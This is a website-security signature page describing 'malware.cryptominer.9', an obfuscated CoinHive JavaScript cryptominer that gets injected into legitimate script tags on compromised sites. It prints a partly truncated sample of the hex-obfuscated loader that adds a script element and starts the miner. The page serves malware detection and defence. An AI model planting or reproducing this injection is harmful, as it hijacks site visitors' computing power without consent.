SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware.cryptominer.9

malware.cryptominer.9

Description:
One of many obfuscated CoinHive JavaScript miner injections, which usually means that it's used without webmaster's consent.

var _0x6477=[​"x73x63x72​x69x70x74","x63x72x65x61x74x65​x45x6Cx65x6D...skipped...x69x32x57x79x54x56​x43x51x50x63x4C"];function require​(_0xf591x2​,_0xf591x3){var _0xf591x4=document[​_0x6477[1]](_0x6477[0])​;_0xf591x4[_0x6477[2]]= _0xf591x2;_0xf591x4[_0x6477[3]]= _0x6477[4];_0xf591x4[_0x6477[6]](_0x6477[5],_0xf591x3);document​[_0x6477[9]](_0x6477[8])[0][_0x6477[7]](_0xf591x4)}
require​(_0x6477[10],function(){ new CoinHive​.Anonymous(_0x6477[12])[_0x6477[11]]()})

Affecting: Any website. This code is usually found injected inside legitimate script tags.